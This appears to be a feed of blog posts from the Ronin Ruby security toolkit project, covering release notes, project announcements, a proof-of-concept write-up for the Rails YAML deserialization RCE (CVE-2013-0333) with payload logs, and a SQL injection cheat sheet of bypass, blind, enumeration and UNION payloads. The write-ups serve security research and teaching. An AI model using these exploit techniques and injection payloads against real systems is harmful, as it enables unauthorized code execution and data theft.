<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/74">Add ronin-core as a dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/73">Refactor Ronin::CLI::Commands classes to use ronin-core and command_kit</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/69">Move yard development dependencies into Gemfile</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/68">Remove the uri-query_params dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/67">Remove the pullr dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/66">Remove the parameters dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/65">Remove the object_loader dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/64">Remove the data_paths dependency</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/63">Remove all ripl-* dependencies</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/60">Refactor Ronin::CLI to use CommandKit</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/46">ronin with no arguments should print help</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/45">Remove bin/ronin-* commands in favor of a single ronin command with subcommands</a></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><a href="https://github.com/ronin-rb/ronin/issues/44">ronin help should list other ronin-* commands from other ronin-* libraries</a></li>
</ul>
<h2 id="the-future">The Future</h2>
<p>After The Big Refactor is completed, I have plans to create additional new
Ronin libraries and tools for various tasks. This refactoring and re-organizing
of the dependencies should make the creation of new Ronin libraries and tools
much easier.</p>
<p>Here are some ideas:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">ronin-nmap</code> - allow automating <a href="https://nmap.org/download.html">nmap</a> and importing scan files into
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-masscan</code> - allow automating <a href="https://github.com/robertdavidgraham/masscan#readme">masscan</a> and importing scan files into
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-amass</code> - allow automating <a href="https://github.com/OWASP/Amass#readme">amass</a> and importing scan files into
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-nvd</code> - imports <a href="https://nvd.nist.gov/vuln/data-feeds">NVD JSON feeds</a> and CVE data into <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-wordlists</code> - a library for downloading and managing wordlists.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-wordlist-builder</code> - a library for building wordlists from various
sources.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-ncrack</code> - allow automating <code class="language-plaintext highlighter-rouge">ncrack</code> and using <code class="language-plaintext highlighter-rouge">ronin-wordlists</code>.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-brute</code> - a collection of credential bruteforcers using
<code class="language-plaintext highlighter-rouge">ronin-wordlists</code>.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-recon</code> - an extendable recon engine, that can also load custom
rules.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-scanner</code> - an extendable scanner that can load custom rules.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-hub</code> - a web application to provides a web interface to all major
ronin libraries and exposes the <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
</ul>
<h2 id="conclusion">Conclusion</h2>
<p>If you have made it this far and are interested in helping out, feel free to
join our <a href="https://discord.gg/6WAb3PsVX9">Discord</a> server and get in touch!</p>
ronin-support 0.5.2 and ronin 1.5.1 released!2021-02-28 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2021/02/28/ronin-support-0-5-2-and-ronin-1-5-1-released.html<p><a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> <a href="https://rubygems.org/gems/ronin-support/versions/0.5.2">0.5.2</a> and <a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://rubygems.org/gems/ronin/versions/1.5.1">1.5.1</a> have been released!</p>
<h3 id="install">Install</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem install install -v 1.5.1
</code></pre></div></div>
<h3 id="update">Update</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem update ronin-support ronin
</code></pre></div></div>
<h3 id="bundler">Bundler</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ bundle update ronin-support ronin
</code></pre></div></div>
<h2 id="whats-new">What’s New</h2>
<h3 id="ruby-30-support">Ruby 3.0 Support</h3>
<p>These releases mainly contains minor bug fixes, but most importantly it adds
support for <a href="https://www.ruby-lang.org/en/news/2020/12/25/ruby-3-0-0-released/">Ruby 3.0</a>!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chruby ruby-3.0
$ gem install ronin
...
$ ronin
>> RONIN_VERSION
=> "1.5.1"
>> RUBY_VERSION
=> "3.0.0"
</code></pre></div></div>
<h2 id="changelogs">ChangeLogs</h2>
<ul>
<li><a href="https://github.com/ronin-rb/ronin-support/blob/main/ChangeLog.md#052--2021-02-28">ronin-support 0.5.2</a></li>
<li><a href="https://github.com/ronin-rb/ronin/blob/main/ChangeLog.md#151--2021-02-28">ronin 1.5.1</a></li>
</ul>
<h2 id="checksums">Checksums</h2>
<ul>
<li><code class="language-plaintext highlighter-rouge">ronin-support-0.5.2.gem</code>:
<ul>
<li><strong>SHA256</strong>: <code class="language-plaintext highlighter-rouge">1b48cd59db44e6a91e46c2f8ee469d86701571352540ad0ce61f8ad2d18c632d</code></li>
<li><strong>SHA512</strong>:
<code class="language-plaintext highlighter-rouge">735b24c2e57ffae494bcb07d5da2ca87514a670b2b853e7a81e2e4ee4ca793c326245fe659433e0e1cf674893390b655c65dbad8d562d0f48001dd4b3551ed23</code></li>
<li><a href="https://github.com/ronin-rb/ronin-support/releases/download/v0.5.2/ronin-support-0.5.2.gem.asc">PGP</a></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">ronin-1.5.1.gem</code>:
<ul>
<li><strong>SHA256</strong>: <code class="language-plaintext highlighter-rouge">ea79d74e610c3d92b2e4c58dba23ff7d185dd1a7852bea6023bcb94eb835b471</code></li>
<li><strong>SHA512</strong>: <code class="language-plaintext highlighter-rouge">6c2ea5cbaf975c668f4fc5005db658da1de102ae9549daed615061c2c942c714d10a9ffb594839f3c6998d7a8f32035f937d8cb9f56f8e96586c0a3511de78b8</code></li>
<li><a href="https://github.com/ronin-rb/ronin/releases/download/v1.5.1/ronin-1.5.1.gem.asc">PGP</a></li>
</ul>
</li>
</ul>
We're on Discord now2021-01-02 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2021/01/02/were-on-discord-now.html<p>While we’re still nostalgic about IRC, it’s not quite the popular place it
once was. Plus it lacked syntax highlighting and offline message buffering,
among other features.</p>
<p>So I have decided to setup a Discord server for Ronin. Drop by and say
hi; but please don’t spam the emotes.</p>
<ul>
<li><a href="https://discord.gg/6WAb3PsVX9">Join Discord</a></li>
</ul>
New Year, new domain2021-01-01 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2021/01/01/new-year-new-domain.html<p>We have made it to 2021. To celebrate the new year and new possibilities,
I’ve decided to “rebrand” Ronin and rename it’s domain, GitHub Org, etc.</p>
<ul>
<li>Domain: <a href="https://ronin-rb.dev">ronin-rb.dev</a></li>
<li>GitHub Org: <a href="https://github.com/ronin-rb">ronin-rb</a></li>
</ul>
<p>Not only is this easier to type than “ronin_ruby”, it helps differentiate the
project from other projects that also use the Ronin name.</p>
Ideas Pages2013-03-30 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2013/03/30/ideas-pages.html<p>Well, the deadline to submit Mentor Organization applications to <a href="http://www.google-melange.com/gsoc/homepage/google/gsoc2013">Google Summer
of Code 2013 (GSoC)</a> crept up on us again. Unfortunately, we were unable
to submit an application in time. One of the requirements we were missing was
ideas for projects that Students could work on.</p>
<p>In order to prepare for Google Summer of Code 2014, we created Ideas pages on
the Wikis:</p>
<ul>
<li><a href="https://github.com/ronin-rb/ronin/wiki/Ideas">ronin</a></li>
<li><a href="https://github.com/ronin-rb/ronin-asm/wiki/Ideas">ronin-asm</a></li>
<li><a href="https://github.com/ronin-rb/ronin-bruteforcers/wiki/Ideas">ronin-bruteforcers</a></li>
<li><a href="https://github.com/ronin-rb/ronin-exploits/wiki/Ideas">ronin-exploits</a></li>
<li><a href="https://github.com/ronin-rb/ronin-scanners/wiki/Ideas">ronin-scanners</a></li>
<li><a href="https://github.com/ronin-rb/ronin-sql/wiki/Ideas">ronin-sql</a></li>
</ul>
<p>If you have an idea for a cool feature that Ronin is currently missing,
add it to one of the Ideas pages. Who knows, someone might implement one of
your ideas sooner than you think. ;)</p>
Rails PoC exploit for CVE-2013-03332013-01-28 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2013/01/28/new-rails-poc.html<p><strong>TL;DR:</strong> Same YAML <a href="/blog/2013/01/09/rails-pocs.html">vulnerability</a>, different code-path.</p>
<ul>
<li><a href="https://gist.github.com/4660248">rails_omakase.rb</a></li>
</ul>
<p>Hot on the heels of <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a>, <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo">CVE-2013-0333</a> was announced.
A code-path was discovered that allows <code class="language-plaintext highlighter-rouge">text/json</code> requests to be
translated into and parsed as YAML. This behavior <em>only</em> exists in
Rails 2.3.x and 3.0.x.</p>
<p>This exploit uses the same YAML deserialization technique as the previous
<a href="https://gist.github.com/4499206">Rails PoC exploit</a>. Please see the previous <a href="/blog/2013/01/09/rails-pocs.html">write-up</a> for a
detailed explanation of how to achieve Remote Code Execution (RCE) via
<code class="language-plaintext highlighter-rouge">YAML.load</code>.</p>
<h2 id="activesupportjson">ActiveSupport::JSON</h2>
<p>In Rails 3.0.x, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/decoding.rb">ActiveSupport::JSON</a> acts as a proxy to various JSON parsing
libraries. By default Rails 3.0.x provides the <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a>, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yajl.rb">Yajl</a> and <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a>
backends. <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a> uses the <a href="http://flori.github.com/json/">json</a> gem, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yajl.rb">Yajl</a> uses the high-performance
<a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yajl.rb">yajl</a> JSON parser, and <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a> attempts to translate JSON into YAML
before passing it to <code class="language-plaintext highlighter-rouge">YAML.load</code>. Oddly enough, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a> (and not <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a>)
is the default JSON backend in Rails 3.0.x:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">ActiveSupport</span><span class="o">::</span><span class="no">JSON</span><span class="p">.</span><span class="nf">backend</span>
<span class="c1"># => ActiveSupport::JSON::Backends::Yaml</span></code></pre></figure>
<p>The problem with the <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a> backend is that it’s <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb#L29-L96">convert_json_to_yaml</a> method
is incredibly naive. The method uses <a href="http://rubydoc.info/stdlib/strscan/StringScanner">StringScanner</a> to walk through the JSON
string, replacing JSON tokens with their YAML equivalents. The method does not
fully parse the JSON in order to emit proper YAML, nor does it validate that
the input is actually valid JSON. This is our opening.</p>
<p>However, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb#L29-L96">convert_json_to_yaml</a> does replace all <code class="language-plaintext highlighter-rouge">:</code> characters with <code class="language-plaintext highlighter-rouge">: </code>,
in an attempt to convert JSON Hashes into YAML Hashes. This will corrupt
our YAML tags:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">yaml</span> <span class="o">=</span> <span class="s2">"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection"</span>
<span class="no">ActiveSupport</span><span class="o">::</span><span class="no">JSON</span><span class="o">::</span><span class="no">Backends</span><span class="o">::</span><span class="no">Yaml</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="ss">:convert_json_to_yaml</span><span class="p">,</span><span class="n">yaml</span><span class="p">)</span>
<span class="c1"># => "--- !ruby/hash: ActionController: : Routing: : RouteSet: : NamedRouteCollection"</span></code></pre></figure>
<p>Luckily, <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb#L29-L96">convert_json_to_yaml</a> also parses JSON unicode-escaped characters:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">ActiveSupport</span><span class="o">::</span><span class="no">JSON</span><span class="o">::</span><span class="no">Backends</span><span class="o">::</span><span class="no">Yaml</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="ss">:convert_json_to_yaml</span><span class="p">,</span><span class="n">yaml</span><span class="p">.</span><span class="nf">gsub</span><span class="p">(</span><span class="s1">':'</span><span class="p">,</span><span class="s1">'\u003a'</span><span class="p">))</span>
<span class="c1"># => "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection"</span></code></pre></figure>
<p>Now to get the YAML payload from <a href="https://gist.github.com/4499206">rails_rce.rb</a> executing. The <code class="language-plaintext highlighter-rouge">module_eval</code>ed
code in <a href="https://github.com/rails/rails/blob/v3.0.19/actionpack/lib/action_dispatch/routing/route_set.rb#L166-L171">ActionController::Routing::RouteSet::NamedRouteCollection#define_hash_access</a>
was similar to that of Rails 2.8.x, and was changed in <a href="https://github.com/rails/rails/blob/v3.1.0/actionpack/lib/action_dispatch/routing/route_set.rb#L166-L171">Rails 3.1.x</a>.
Due to this difference, we simply reused the Rails 2.x payload from the
<a href="https://gist.github.com/4499206">rails_rce.rb</a> exploit.</p>
<p>After some minor modifications to <a href="https://gist.github.com/4499206">rails_rce.rb</a> we had a working exploit:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ rails_omakase http://localhost:3000/secrets "puts 'lol'"
lol
Started POST "/secrets" for 127.0.0.1 at 2013-01-28 18:53:18 -0800
Processing by SecretsController#show as
Parameters: {"_json"=>#<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0x00000002221080 @routes={:"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n"=>#<struct defaults={:action=>"create", :controller=>"foos"}, required_parts=[], requirements={:action=>"create", :controller=>"foos"}, segment_keys=[:format]>}, @helpers=[:"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path"], @module=#<Module:0x00000002220fb8>>}
Rendered text template (0.0ms)
Completed 200 OK in 2ms (Views: 1.4ms | ActiveRecord: 0.0ms)
</code></pre></div></div>
<h2 id="again">Again?</h2>
<p>When Rails was updated for <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a>, it did not actually fix the
underlying root cause, that the <a href="https://github.com/tenderlove/psych">Psych</a> YAML parser
<a href="https://github.com/tenderlove/psych/issues/119">does not have a safe-mode</a>. As long as developers continue allowing
user-input near <code class="language-plaintext highlighter-rouge">YAML.load</code>, and there is no safe-mode to prevent YAML from
deserializing arbitrary Classes, YAML deserialization vulnerabilities will
continue to pop up. In the meantime, there is a <a href="https://github.com/dtao/safe_yaml#readme">safe_yaml</a> library, which
provides a safe-mode and does prevent <a href="https://gist.github.com/4660248">rails_omakase.rb</a> from working:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Started POST "/secrets" for 127.0.0.1 at 2013-01-28 21:34:37 -0800
Processing by SecretsController#show as
Parameters: {"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n"=>{"defaults"=>{":action"=>"create", ":controller"=>"foos"}, "required_parts"=>nil, "requirements"=>{":action"=>"create", ":controller"=>"foos"}, "segment_keys"=>[":format"]}}
Rendered text template (0.0ms)
Completed 200 OK in 2ms (Views: 1.2ms | ActiveRecord: 0.0ms)
</code></pre></div></div>
<p><strong>Update:</strong> <a href="https://twitter.com/nelhage">@nelhage</a> has also written a <a href="https://gist.github.com/4659489">monkey-patch</a> for YAML,
that prevents any non-primitive objects from being deserialized. I have tested
this workaround against <a href="https://gist.github.com/4660248">rails_omakase.rb</a> on Ruby 1.9.3-p362 and Rails 3.0.19,
and can confirm it prevents the exploit from working. However, once loaded
it effects all <code class="language-plaintext highlighter-rouge">YAML.load</code> calls and cannot be disabled.</p>
<h2 id="omakase">Omakase?</h2>
<p>I named this exploit <a href="https://gist.github.com/4660248">rails_omakase.rb</a>, as an ode to <a href="http://david.heinemeierhansson.com/2012/rails-is-omakase.html">Rails Is Omakase</a>;
I highly recommend the <a href="http://gilesbowkett.blogspot.com/2013/01/a-dramatic-reading-of-rails-is-omakase.html">dramatic reading</a>. In the blog post,
David Heinemeier Hansson (DHH) discusses the criticism Rails Core has received
over their changes to default settings. His main complaint is that merely
complaining about the changes, and not contributing code, does not improve the
development process of Rails.</p>
<p>This vulnerability was the result of <a href="https://github.com/rails/rails/commit/a87683fb38d6cf66f39a7bd3faa6c969c63b1f46">changing the default JSON backend</a> from
<a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/jsongem.rb">JSONGem</a> to <a href="https://github.com/rails/rails/blob/v3.0.19/activesupport/lib/active_support/json/backends/yaml.rb">Yaml</a>. Additionally, it is unclear why anyone would ever
consider attempting to convert JSON into YAML, without fully parsing it first.
Like wise, <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a> is equally perplexing, who could possibly think any
good would come from embedding YAML in XML?</p>
<p>Despite DHH’s reassurance that Rails Core has the best of intentions when they
change default settings, they can and do make mistakes.</p>
RSnakes SQLi Cheat Sheet using ronin-sql 1.1.02013-01-22 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2013/01/22/rsnake-sqli-cheat-sheet-using-ronin-sql-1-1-0.html<p>After the release of <a href="https://github.com/ronin-rb/ronin-sql#readme">ronin-sql</a> 1.0.0, I wondered if we could recreate
<a href="http://ha.ckers.org/sqlinjection/">RSnake’s SQL Injection Cheat Sheet</a> using the new <a href="/docs/ronin-sql/Ronin/SQL.html">Ronin::SQL</a>
Domain Specific Language (DSL). Let’s see how far we can get.</p>
<p>Normal SQL Injection:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span> <span class="k">OR</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># => 1 OR 1=1</span></code></pre></figure>
<p>Normal SQL Injection using encapsulated data:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span><span class="s1">' OR '</span><span class="mi">1</span><span class="s1">'='</span><span class="mi">1</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="ss">escape: :string</span><span class="p">)</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1' OR '1'='1</span></code></pre></figure>
<p>Blind SQL Injection:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span> <span class="k">AND</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 AND 1=1</span></code></pre></figure>
<p>Blind SQL Injection to attempt to locate <code class="language-plaintext highlighter-rouge">tablename</code> by brute-force
iteration through table name permutations:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span><span class="s1">' AND 1=(SELECT COUNT(*) FROM tablenames); --</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="ss">escape: :string</span><span class="p">)</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">and</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="n">count</span><span class="p">).</span><span class="nf">from</span><span class="p">(</span><span class="ss">:tablenames</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 AND (SELECT COUNT(*) FROM tablenames)=1</span></code></pre></figure>
<p>Creating errors by calling non-existent tables:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span><span class="s1">' AND non_existant_table = '</span><span class="mi">1</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="ss">escape: :string</span><span class="p">)</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">and</span> <span class="p">{</span> <span class="n">non_existant_table</span> <span class="o">==</span> <span class="s1">'1'</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1' AND non_existant_table='1</span></code></pre></figure>
<p>Dumping usernames:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">' OR username IS NOT NULL OR username = '</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="ss">escape: :string</span><span class="p">)</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="n">username</span><span class="p">.</span><span class="nf">is_not</span><span class="p">(</span><span class="n">null</span><span class="p">)</span> <span class="p">}.</span><span class="nf">or</span> <span class="p">{</span> <span class="n">username</span> <span class="o">==</span> <span class="s1">''</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1' OR username IS NOT NULL OR username='</span></code></pre></figure>
<p>Enumerating through database table names:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span> <span class="k">AND</span> <span class="n">ASCII</span><span class="p">(</span><span class="k">LOWER</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">TOP</span> <span class="mi">1</span> <span class="n">name</span> <span class="k">FROM</span> <span class="n">sysobjects</span> <span class="k">WHERE</span> <span class="n">xtype</span><span class="o">=</span><span class="s1">'U'</span><span class="p">),</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)))</span> <span class="o">></span> <span class="mi">116</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">and</span> <span class="p">{</span>
<span class="n">ascii</span><span class="p">(</span>
<span class="n">lower</span><span class="p">(</span>
<span class="n">substring</span><span class="p">(</span>
<span class="nb">select</span><span class="p">(</span><span class="ss">:name</span><span class="p">).</span><span class="nf">top</span><span class="p">(</span><span class="mi">1</span><span class="p">).</span><span class="nf">from</span><span class="p">(</span><span class="n">sysobjects</span><span class="p">).</span><span class="nf">where</span> <span class="p">{</span> <span class="n">xtype</span> <span class="o">==</span> <span class="s1">'U'</span> <span class="p">},</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span>
<span class="p">)</span>
<span class="p">)</span>
<span class="p">)</span> <span class="o">></span> <span class="mi">116</span>
<span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 AND ASCII(LOWER(SUBSTRING((SELECT name TOP 1 FROM sysobjects WHERE xtype='U'),1,1)))>116</span></code></pre></figure>
<p>Finding user supplied tables using the <code class="language-plaintext highlighter-rouge">sysObjects</code> table in SQL Server:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span> <span class="k">UNION</span> <span class="k">ALL</span> <span class="k">SELECT</span> <span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="n">name</span> <span class="k">FROM</span> <span class="n">sysObjects</span> <span class="k">WHERE</span> <span class="n">xtype</span> <span class="o">=</span> <span class="s1">'U'</span> <span class="c1">--</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">union_all</span> <span class="p">{</span>
<span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="nb">name</span><span class="p">).</span><span class="nf">from</span><span class="p">(</span><span class="n">sysObjects</span><span class="p">).</span><span class="nf">where</span> <span class="p">{</span> <span class="n">xtype</span> <span class="o">==</span> <span class="s1">'U'</span> <span class="p">}</span>
<span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span><span class="p">.</span><span class="nf">to_sql</span><span class="p">(</span><span class="ss">:terminate</span> <span class="o">=></span> <span class="kp">true</span><span class="p">)</span>
<span class="c1"># 1 UNION ALL (SELECT (1,2,3,4,5,6,name) FROM sysObjects WHERE xtype='U');--</span></code></pre></figure>
